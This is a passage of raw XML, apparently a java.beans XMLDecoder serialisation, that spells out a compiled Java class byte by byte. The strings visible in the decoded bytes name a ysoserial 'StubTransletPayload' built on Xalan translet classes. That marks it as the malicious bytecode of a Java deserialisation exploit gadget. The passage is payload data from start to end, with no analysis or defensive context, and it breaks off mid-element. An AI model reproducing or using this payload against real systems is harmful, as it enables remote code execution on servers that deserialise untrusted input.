index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void index=\"778\"><byte>47</byte></void><void index=\"779\"><byte>97</byte></void><void index=\"780\"><byte>112</byte></void><void index=\"781\"><byte>97</byte></void><void index=\"782\"><byte>99</byte></void><void index=\"783\"><byte>104</byte></void><void index=\"784\"><byte>101</byte></void><void index=\"785\"><byte>47</byte></void><void index=\"786\"><byte>120</byte></void><void index=\"787\"><byte>97</byte></void><void index=\"788\"><byte>108</byte></void><void index=\"789\"><byte>97</byte></void><void index=\"790\"><byte>110</byte></void><void index=\"791\"><byte>47</byte></void><void index=\"792\"><byte>105</byte></void><void index=\"793\"><byte>110</byte></void><void index=\"794\"><byte>116</byte></void><void index=\"795\"><byte>101</byte></void><void index=\"796\"><byte>114</byte></void><void index=\"797\"><byte>110</byte></void><void index=\"798\"><byte>97</byte></void><void index=\"799\"><byte>108</byte></void><void index=\"800\"><byte>47</byte></void><void index=\"801\"><byte>120</byte></void><void index=\"802\"><byte>115</byte></void><void index=\"803\"><byte>108</byte></void><void index=\"804\"><byte>116</byte></void><void index=\"805\"><byte>99</byte></void><void index=\"806\"><byte>47</byte></void><void index=\"807\"><byte>68</byte></void><void index=\"808\"><byte>79</byte></void><void index=\"809\"><byte>77</byte></void><void index=\"810\"><byte>59</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void index=\"860\"><byte>97</byte></void><void index=\"861\"><byte>108</byte></void><void index=\"862\"><byte>105</byte></void><void index=\"863\"><byte>122</byte></void><void index=\"864\"><byte>97</byte></void><void index=\"865\"><byte>116</byte></void><void index=\"866\"><byte>105</byte></void><void index=\"867\"><byte>111</byte></void><void index=\"868\"><byte>110</byte></void><void index=\"869\"><byte>72</byte></void><void index=\"870\"><byte>97</byte></void><void index=\"871\"><byte>110</byte></void><void index=\"872\"><byte>100</byte></void><void index=\"873\"><byte>108</byte></void><void index=\"874\"><byte>101</byte></void><void index=\"875\"><byte>114</byte></void><void index=\"876\"><byte>59</byte></void><void index=\"877\"><byte>41</byte></void><void index=\"878\"><byte>86</byte></void><void index=\"879\"><byte>1</byte></void><void index=\"880\"><byte>0</byte></void><void index=\"881\"><byte>8</byte></void><void index=\"882\"><byte>100</byte></void><void index=\"883\"><byte>111</byte></void><void index=\"884\"><byte>99</byte></void><void index=\"885\"><byte>117</byte></void><void index=\"886\"><byte>109</byte></void><void index=\"887\"><byte>101</byte></void><void index=\"888\"><byte>110</byte></void><void index=\"889\"><byte>116</byte></void><void index=\"890\"><byte>1</byte></void><void index=\"891\"><byte>0</byte></void><void index=\"892\"><byte>45</byte></void><void index=\"893\"><byte>76</byte></void><void index=\"894\"><byte>99</byte></void><void index=\"895\"><byte>111</byte></void><void index=\"896\"><byte>109</byte></void><void index=\"897\"><byte>47</byte></void><void index=\"898\"><byte>115</byte></void><void index=\"899\"><byte>117</byte></void><void index=\"900\"><byte>110</byte></void><void index=\"901\"><byte>47</byte></void><void index=\"902\"><byte>111</byte></void><void index=\"903\"><byte>114</byte></void><void index=\"904\"><byte>103</byte></void><void index=\"905\"><byte>47</byte></void><void index=\"906\"><byte>97</byte></void><void index=\"907\"><byte>112</byte></void><void index=\"908\"><byte>97</byte></void><void index=\"909\"><byte>99</byte></void><void index=\"910\"><byte>104</byte></void><void index=\"911\"><byte>101</byte></void><void index=\"912\"><byte>47</byte></void><void index=\"913\"><byte>120</byte></void><void index=\"914\"><byte>97</byte></void><void index=\"915\"><byte>108</byte></void><void index=\"916\"><byte>97</byte></void><void index=\"917\"><byte>110</byte></void><void index=\"918\"><byte>47</byte></void><void index=\"919\"><byte>105</byte></void><void index=\"920\"><byte>110</byte></void><void index=\"921\"><byte>116</byte></void><void index=\"922\"><byte>101</byte></void><void index=\"923\"><byte>114</byte></void><void index=\"924\"><byte>110</byte></void><void index=\"925\"><byte>97</byte></void><void index=\"926\"><byte>108</byte></void><void index=\"927\"><byte>47</byte></void><void index=\"928\"><byte>120</byte></void><void index=\"929\"><byte>115</byte></void><void index=\"930\"><byte>108</byte></void><void index=\"931\"><byte>116</byte></void><void index=\"932\"><byte>99</byte></void><void index=\"933\"><byte>47</byte></void><void index=\"934\"><byte>68</byte></void><void index=\"935\"><byte>79</byte></void><void index=\"936\"><byte>77</byte></void><void index=\"937\"><byte>59</byte></void><void index=\"938\"><byte>1</byte></void><void index=\"939\"><byte>0</byte></void><void index=\"940\"><byte>8</byte></void><void index=\"941\"><byte>104</byte></void><void index=\"942\"><byte>97</byte></void><void index=\"943\"><byte>110</byte></void><void index=\"944\"><byte>100</byte></void><void index=\"945\"><byte>108</byte></void><void index=\"946\"><byte>101</byte></void><void index=\"947\"><byte>114</byte></void><void index=\"948\"><byte>115</byte></void><void index=\"949\"><byte>1</byte></void><void index=\"950\"><byte>0</byte></void><void index=\"951\"><byte>66</byte></void><void index=\"952\"><byte>91</byte></void><void index=\"953\"><byte>76</byte></void><void index=\"954\"><byte>99</byte></void><void index=\"955\"><byte>111</byte></void><void index=\"956\"><byte>109</byte></void><void index=\"957\"><byte>47</byte></void><void index=\"958\"><byte>115</byte></void><void index=\"959\"><byte>117</byte></void><void index=\"960\"><byte>110</byte></void><void index=\"961\"><byte>47</byte></void><void index=\"962\"><byte>111</byte></void><void index=\"963\"><byte>114</byte></void><void index=\"964\"><byte>103</byte></void><void index=\"965\"><byte>47</byte></void><void index=\"966\"><byte>97</byte></void><void index=\"967\"><byte>112</byte></void><void index=\"968\"><byte>97</byte></void><void index=\"969\"><byte>99</byte></void><void index=\"970\"><byte>104</byte></void><void index=\"971\"><byte>101</byte></void><void index=\"972\"><byte>47</byte></void><void index=\"973\"><byte>120</byte></void><void index=\"974\"><byte>109</byte></void><void index=\"975\"><byte>108</byte></void><void index=\"976\"><byte>47</byte></void><void index=\"977\"><byte>105</byte></void><void index=\"978\"><byte>110</byte></void><void index=\"979\"><byte>116</byte></void><void index=\"980\"><byte>101</byte></void><void index=\"981\"><byte>114</byte></void><void index=\"982\"><byte>110</byte></void><void index=\"983\"><byte>97</byte></void><void index=\"984\"><byte>108</byte></void><void index=\"985\"><byte>47</byte></void><void index=\"986\"><byte>115</byte></void><void index=\"987\"><byte>101</byte></void><void index=\"988\"><byte>114</byte></void><void index=\"989\"><byte>105</byte></void><void index=\"990\"><byte>97</byte></void><void index=\"991\"><byte>108</byte></void><void index=\"992\"><byte>105</byte></void><void index=\"993\"><byte>122</byte></void><void index=\"994\"><byte>101</byte></void><void index=\"995\"><byte>114</byte></void><void index=\"996\"><byte>47</byte></void><void index=\"997\"><byte>83</byte></void><void index=\"998\"><byte>101</byte></void><void index=\"999\"><byte>114</byte></void><void index=\"1000\"><byte>105</byte></void><void index=\"1001\"><byte>97</byte></void><void index=\"1002\"><byte>108</byte></void><void index=\"1003\"><byte>105</byte></void><void index=\"1004\"><byte>122</byte></void><void index=\"1005\"><byte>97</byte></void><void index=\"1006\"><byte>116</byte></void><void index=\"1007\"><byte>105</byte></void><void index=\"1008\"><byte>111</byte></void><void index=\"1009\"><byte>110</byte></void><void index=\"1010\"><byte>72</byte></void><void index=\"1011\"><byte>97</byte></void><void index=\"1012\"><byte>110</byte></void><void index=\"1013\"><byte>100</byte></void><void index=\"1014\"><byte>108</byte></void><void index=\"1015\"><byte>101</byte></void><void index=\"1016\"><byte>114</byte></void><void index=\"1017\"><byte>59</byte></void><void index=\"1018\"><byte>1</byte></void><void index=\"1019\"><byte>0</byte></void><void index=\"1020\"><byte>10</byte></void><void index=\"1021\"><byte>69</byte></void><void index=\"1022\"><byte>120</byte></void><void index=\"1023\"><byte>99</byte></void><void index=\"1024\"><byte>101</byte></void><void index=\"1025\"><byte>112</byte></void><void index=\"1026\"><byte>116</byte></void><void index=\"1027\"><byte>105</byte></void><void index=\"1028\"><byte>111</byte></void><void index=\"1029\"><byte>110</byte></void><void index=\"1030\"><byte>115</byte></void><void index=\"1031\"><byte>7</byte></void><void index=\"1032\"><byte>0</byte></void><void index=\"1033\"><byte>39</byte></void><void index=\"1034\"><byte>1</byte></void><void index=\"1035\"><byte>0</byte></void><void index=\"1036\"><byte>-90</byte></void><void index=\"1037\"><byte>40</byte></void><void index=\"1038\"><byte>76</byte></void><void index=\"1039\"><byte>99</byte></void><void index=\"1040\"><byte>111</byte></void><void index=\"1041\"><byte>109</byte></void><void index=\"1042\"><byte>47</byte></void><void index=\"1043\"><byte>115</byte></void><void index=\"1044\"><byte>117</byte></void><void index=\"1045\"><byte>110</byte></void><void index=\"1046\"><byte>47</byte></void><void index=\"1047\"><byte>111</byte></void><void index=\"1048\"><byte>114</byte></void><void index=\"1049\"><byte>103</byte></void><void index=\"1050\"><byte>47</byte></void><void index=\"1051\"><byte>97</byte></void><void index=\"1052\"><byte>112</byte></void><void index=\"1053\"><byte>97</byte></void><void index=\"1054\"><byte>99</byte></void><void index=\"1055\"><byte>104</byte></void><void index=\"1056\"><byte>101</byte></void><void index=\"1057\"><byte>47</byte></void><void index=\"1058\"><byte>120</byte></void><void index=\"1059\"><byte>97</byte></void><void index=\"1060\"><byte>108</byte></void><void index=\"1061\"><byte>97</byte></void><void index=\"1062\"><byte>110</byte></void><void index=\"1063\"><byte>47</byte></void><void index=\"1064\"><byte>105</byte></void><void index=\"1065\"><byte>110</byte></void><void index=\"1066\"><byte>116</byte></void><void index=\"1067\"><byte>101</byte></void><void index=\"1068\"><byte>114</byte></void><void index=\"1069\"><byte>110</byte></void><void index=\"1070\"><byte>97</byte></void><void index=\"1071\"><byte>108</byte></void><void index=\"1072\"><byte>47</byte></void><void index=\"1073\"><byte>120</byte></void><void index=\"1074\"><byte>115</byte></void><void index=\"1075\"><byte>108</byte></void><void index=\"1076\"><byte>116</byte></void><void index=\"1077\"><byte>99</byte></void><void index=\"1078\"><byte>47</byte></void><void index=\"1079\"><byte>68</byte></void><void index=\"1080\"><byte>79</byte></void><void index=\"1081\"><byte>77</byte></void><void index=\"1082\"><byte>59</byte></void><void index=\"1083\"><byte>76</byte></void><void index=\"1084\"><byte>99</byte></void><void index=\"1085\"><byte>111</byte></void><void index=\"1086\"><byte>109</byte></void><void index=\"1087\"><byte>47</byte></void><void index=\"1088\"><byte>115</byte></void><void index=\"1089\"><byte>117</byte></void><void index=\"1090\"><byte>110</byte></void><void index=\"1091\"><byte>47</byte></void><void index=\"1092\"><byte>111</byte></void><void index=\"1093\"><byte>114</byte></void><void index=\"1094\"><byte>103</byte></void><void index=\"1095\"><byte>47</byte></void><void index=\"1096\"><byte>97</byte></void><void index=\"1097\"><byte>112</byte></void><void index=\"1098\"><byte>97</byte></void><void index=\"1099\"><byte>99</byte></void><void index=\"1100\"><byte>104</byte></void><void index=\"1101\"><byte>101</byte></void><void index=\"1102\"><byte>47</byte></void><void index=\"1103\"><byte>120</byte></void><void index=\"1104\"><byte>109</byte></void><void index=\"1105\"><byte>108</byte></void><void index=\"1106\"><byte>47</byte></void><void index=\"1107\"><byte>105</byte></void><void index=\"1108\"><byte>110</byte></void><void index=\"1109\"><byte>116</byte></void><void index=\"1110\"><byte>101</byte></void><void index=\"1111\"><byte>114</byte></void><void index=\"1112\"><byte>110</byte></void><void index=\"1113\"><byte>97</byte></void><void index=\"1114\"><byte>108</byte></void><void index=\"1115\"><byte>47</byte></void><void index=\"1116\"><byte>100</byte></void><void index=\"1117\"><byte>116</byte></void><void index=\"1118\"><byte>109</byte></void><void index=\"1119\"><byte>47</byte></void><void index=\"1120\"><byte>68</byte></void><void index=\"1121\"><byte>84</byte></void><void index=\"1122\"><byte>77</byte></void><void index=\"1123\"><byte>65</byte></void><void index=\"1124\"><byte>120</byte></void><void index=\"1125\"><byte>105</byte></void><void index=\"1126\"><byte>115</byte></void><void index=\"1127\"><byte>73</byte></void><void index=\"1128\"><byte>116</byte></void><void index=\"1129\"><byte>101</byte></void><void index=\"1130\"><byte>114</byte></void><void index=\"1131\"><byte>97</byte></void><void index=\"1132\"><byte>116</byte></void><void index=\"1133\"><byte>111</byte></void><void index=\"1134\"><byte>114</byte></void><void index=\"1135\"><byte>59</byte></void><void index=\"1136\"><byte>76</byte></void><void index=\"1137\"><byte>99</byte></void><void index=\"1138\"><byte>111</byte></void><void index=\"1139\"><byte>109</byte></void><void index=\"1140\"><byte>47</byte></void><void index=\"1141\"><byte>115</byte></void><void index=\"1142\"><byte>117</byte></void><void index=\"1143\"><byte>110</byte></void><void index=\"1144\"><byte>47</byte></void><void index=\"1145\"><byte>111</byte></void><void index=\"1146\"><byte>114</byte></void><void index=\"1147\"><byte>103</byte></void><void index=\"1148\"><byte>47</byte></void><void index=\"1149\"><byte>97</byte></void><void index=\"1150\"><byte>112</byte></void><void index=\"1151\"><byte>97</byte></void><void index=\"1152\"><byte>99</byte></void><void index=\"1153\"><byte>104</byte></void><void index=\"1154\"><byte>101</byte></void><void index=\"1155\"><byte>47</byte></void><void index=\"1156\"><byte>120</byte></void><void index=\"1157\"><byte>109</byte></void><void index=\"1158\"><byte>108</byte></void><void index=\"1159\"><byte>47</byte></void><void index=\"1160\"><byte>105</byte></void><void index=\"1161\"><byte>110</byte></void><void index=\"1162\"><byte>116</byte></void><void index=\"1163\"><byte>101</byte></void><void index=\"1164\"><byte>114</byte></void><void index=\"1165\"><byte>110</byte></void><void index=\"1166\"><byte>97</byte></void><void index=\"1167\"><byte>108</byte></void><void index=\"1168\"><byte>47</byte></void><void index=\"1169\"><byte>115</byte></void><void index=\"1170\"><byte>101</byte></void><void index=\"1171\"><byte>114</byte></void><void index=\"1172\"><byte>105</byte></void><void index=\"1173\"><byte>97</byte></void><void index=\"1174\"><byte>108</byte></void><void index=\"1175\"><byte>105</byte></void><void index=\"1176\"><byte>122</byte></void><void index=\"1177\"><byte>101</byte></void><void index=\"1178\"><byte>114</byte></void><void index=\"1179\"><byte>47</byte></void><void index=\"1180\"><byte>83</byte></void><void index=\"1181\"><byte>101</byte></void><void index=\"1182\"><byte>114</byte></void><void index=\"1183\"><byte>105</byte></void><void index=\"1184\"><byte>97</byte></void><void index=\"1185\"><byte>108</byte></void><void index=\"1186\"><byte>105</byte></void><void index=\"1187\"><byte>122</byte></void><void index=\"1188\"><byte>97</byte></void><void index=\"1189\"><byte>116</byte></void><void index=\"1190\"><byte>105</byte></void><void index=\"1191\"><byte>111</byte></void><void index=\"1192\"><byte>110</byte></void><void index=\"1193\"><byte>72</byte></void><void index=\"1194\"><byte>97</byte></void><void index=\"1195\"><byte>110</byte></void><void index=\"1196\"><byte>100</byte></void><void index=\"1197\"><byte>108</byte></void><void index=\"1198\"><byte>101</byte></void><void index=\"1199\"><byte>114</byte></void><void index=\"1200\"><byte>59</byte></void><void index=\"1201\"><byte>41</byte></void><void index=\"1202\"><byte>86</byte></void><void index=\"1203\"><byte>1</byte></void><void index=\"1204\"><byte>0</byte></void><void index=\"1205\"><byte>8</byte></void><void index=\"1206\"><byte>105</byte></void><void index=\"1207\"><byte>116</byte></void><void index=\"1208\"><byte>101</byte></void><void index=\"1209\"><byte>114</byte></void><void index=\"1210\"><byte>97</byte></void><void index=\"1211\"><byte>116</byte></void><void index=\"1212\"><byte>111</byte></void><void index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>1</byte></void><void index=\"1215\"><byte>0</byte></void><void index=\"1216\"><byte>53</byte></void><void index=\"1217\"><byte>76</byte></void><void index=\"1218\"><byte>99</byte></void><void index=\"1219\"><byte>111</byte></void><void index=\"1220\"><byte>109</byte></void><void index=\"1221\"><byte>47</byte></void><void index=\"1222\"><byte>115</byte></void><void index=\"1223\"><byte>117</byte></void><void index=\"1224\"><byte>110</byte></void><void index=\"1225\"><byte>47</byte></void><void index=\"1226\"><byte>111</byte></void><void index=\"1227\"><byte>114</byte></void><void index=\"1228\"><byte>103</byte></void><void index=\"1229\"><byte>47</byte></void><void index=\"1230\"><byte>97</byte></void><void index=\"1231\"><byte>112</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>99</byte></void><void index=\"1234\"><byte>104</byte></void><void index=\"1235\"><byte>101</byte></void><void index=\"1236\"><byte>47</byte></void><void index=\"1237\"><byte>120</byte></void><void index=\"1238\"><byte>109</byte></void><void index=\"1239\"><byte>108</byte></void><void index=\"1240\"><byte>47</byte></void><void index=\"1241\"><byte>105</byte></void><void index=\"1242\"><byte>110</byte></void><void index=\"1243\"><byte>116</byte></void><void index=\"1244\"><byte>101</byte></void><void index=\"1245\"><byte>114</byte></void><void index=\"1246\"><byte>110</byte></void><void index=\"1247\"><byte>97</byte></void><void index=\"1248\"><byte>108</byte></void><void index=\"1249\"><byte>47</byte></void><void index=\"1250\"><byte>100</byte></void><void index=\"1251\"><byte>116</byte></void><void index=\"1252\"><byte>109</byte></void><void index=\"1253\"><byte>47</byte></void><void index=\"1254\"><byte>68</byte></void><void index=\"1255\"><byte>84</byte></void><void index=\"1256\"><byte>77</byte></void><void index=\"1257\"><byte>65</byte></void><void index=\"1258\"><byte>120</byte></void><void index=\"1259\"><byte>105</byte></void><void index=\"1260\"><byte>115</byte></void><void index=\"1261\"><byte>73</byte></void><void index=\"1262\"><byte>116</byte></void><void index=\"1263\"><byte>101</byte></void><void index=\"1264\"><byte>114</byte></void><void index=\"1265\"><byte>97</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>111</byte></void><void index=\"1268\"><byte>114</byte></void><void index=\"1269\"><byte>59</byte></void><void index=\"1270\"><byte>1</byte></void><void index=\"1271\"><byte>0</byte></void><void index=\"1272\"><byte>7</byte></void><void index=\"1273\"><byte>104</byte></void><void index=\"1274\"><byte>97</byte></void><void index=\"1275\"><byte>110</byte></void><void index=\"1276\"><byte>100</byte></void><void index=\"1277\"><byte>108</byte></void><void index=\"1278\"><byte>101</byte></void><void 